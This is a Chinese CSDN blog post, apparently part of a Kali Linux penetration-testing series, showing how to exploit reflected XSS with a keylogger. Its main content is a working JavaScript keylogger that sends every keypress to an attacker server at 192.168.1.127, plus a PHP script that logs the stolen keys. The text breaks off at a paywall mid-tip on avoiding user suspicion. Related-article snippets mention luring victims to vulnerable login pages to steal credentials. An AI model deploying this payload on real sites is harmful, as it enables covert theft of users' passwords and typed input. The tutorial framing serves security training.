kali安装keylogger_小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser...

最新推荐文章于 2023-09-15 14:27:01 发布
最新推荐文章于 2023-09-15 14:27:01 发布
阅读量606 收藏 2
点赞数
文章标签: kali安装keylogger
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29344293/article/details/111977780
版权

XSS

原则上:只要XSS漏洞存在,可以编写任何功能的js脚本

【反射型漏洞利用】

键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上

服务器:kali    客户端

启动apache2服务:service apache2 start

语法:

keylogger.js

1 document.onkeypress = function(evt) {2 evt = evt || window.event3 key = String.fromCharCode(evt.charCode)4 if(key) {5 var http = new XMLHttpRequest();6 var param = encodeURI(key)7 http.open("POST","http://192.168.1.127/keylogger.php",true);8 http.setRequestHeader("Content-type","application/x-www-form-urlencoded");9 http.send("key="+param);10 }11 }12 ~

keylogger.php  【用来接受客户端提交上来的数据】

1 <?php2 $key=$_POST['key'];3 $logfile="keylog.txt";4 $fp = fopen($logfile,"a");5 fwrite($fp,$key);6 fclose($fp);7 >

为避免被引起用户怀疑,可将跳转命

最低0.47元/天 解锁文章
欧阳竞
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali安装keylogger_Kali Linux启动Beef-Xss漏洞利用框架教程:
weixin_35515918的博客
12-24 336
注:首先将默认浏览器的IP地址设为本机回环代理地址,IP格式:127.0.0.1,Port:8080,勾选Socks5,勾选Remote DNS,设置完成!root@kali:~# cd /user/share/beef-xssroot@kali:~# beef-xss注:开启后自动跳转到Beef登录界面,链接:http://127.0.0.1/3000/ui/authentication,默认用...
kali键盘记录
jhbgvk23的博客
04-20 3443
键盘记录
kali渗透测试Web渗透-XSS-漏洞利用-键盘记录器xsser
hacker3062的博客
09-15 388
进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如】)】{可用burpsuite进行编码}-v:显示详细信息;–heuristic  探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql}  【所有过滤机制都是基于字符过滤】伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码。可使用图形化界面  xsser --gtk  【不建议使用,界面不够友好】:将对应页面和参数写进**-g**参数中;
Kali linux 学习笔记(五十三)Web渗透——XSSer 2020.3.30
闵行小鱼塘
03-30 2424
前言 本节学习XSSer 一个用来实施XSS的工具
渗透测试工具:跨站脚本漏洞检测---Xsser
gao646467783的博客
01-27 3599
文章目录简介:用法:(一)、Options:()、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、选择Bypasser(s):(九)、 特殊的技巧:(十)、 Select Final injection(s):(十一)、 Special Final injection(s):(十)、 混杂模式:(十三)、 Reporting:(十四)、Miscellaneous: 简介: 跨站脚本者是一个自动框架
50-50.渗透测试-Kali Linux漏洞利用
最新发布
05-10
50-50.渗透测试-Kali Linux漏洞利用
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
49-49.渗透测试-Kali Linux漏洞扫描.mp4
05-10
49-49.渗透测试-Kali Linux漏洞扫描.mp4
48-48.渗透测试-Kali Linux信息收集
05-10
48-48.渗透测试-Kali Linux信息收集
XSSer:自动化XSS漏洞检测及利用工具
09-04
XSSer:自动化XSS漏洞检测及利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测、利用以及报告基于Web应用程序 中的XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术。
xss漏洞工具 -- xsser
weixin_41489908的博客
01-02 3435
深情的人一般会被嫌幼稚,懂事的人一般很穷,于是便把深情喂了狗,把懂事换了柴米油盐。。。 今天给大家介绍一款xss漏洞利用工具:xsser 一、环境:kali19.4 python3 安装过程: 1、复制到本地安装包 git clone https://github.com/epsylon/xsser.git 2、安装依赖 cd xsser python3 setup.py install ...
近源渗透测试Keylogger实战
Xor0ne
08-01 2757
近源渗透测试Keylogger实战 转载,侵删原创 大好人来源于公众号:雷神众测原文链接:https://mp.weixin.qq.com/s?__biz ... 8a1fcbc183d841c4#rd 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,...
黑帽python第版(Black Hat Python 2nd Edition)读书笔记 之 第八章 Windows常见特洛伊木马任务(1)有趣的键盘记录器
阿尔泰野狼的博客
10-21 870
本文记录了博主在阅读Black Hat Python 2nd Edition过程中的心得与踩坑经历。
xsser漏洞工具安装
qq_34835587的博客
10-19 4863
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Kali linux 学习笔记(六十三)密码破解——中间人攻击(mitmf、ettercap、PTH) 2020.4.7
闵行小鱼塘
04-07 1908
本节学习中间人攻击,主要是mitmf、ettercap、PTH
linux下的键盘记录
fengling132的专栏
05-02 1641
安装: wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz tar -xf logkeys-0.1.XX.tar.gz cd logkeys-0.1.XX ./configure make make check make install   使用: logkeys -s -u -o log.txt
Kali Linux渗透测试 099 自动注入-Xsser
kevinhanser
03-26 3233
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 命令行 root@kali:~# xsser 图形化 root@kali:~# xsser –gtk 2. 简单使用http://10.10.10.132/dvwa/vulnerabilities
KeyLogger
windworst的专栏
10-08 863
// Keyboard.cpp : Defines the entry point for the DLL application. // //#include "stdafx.h" #include #include HINSTANCE g_hInstance = NULL; HHOOK Kg_hHook = NULL; char Buff[10]= {0}; #define DEBUG_LOG
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
"精通Kali Linux 高级渗透测试2023版本(Mastering Kali Linux for Advanced Penetration Testing Fourth Edition)是一本由Vijay Kumar Velu编写的权威指南,它在当前数字化时代背景下,聚焦于网络安全领域。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值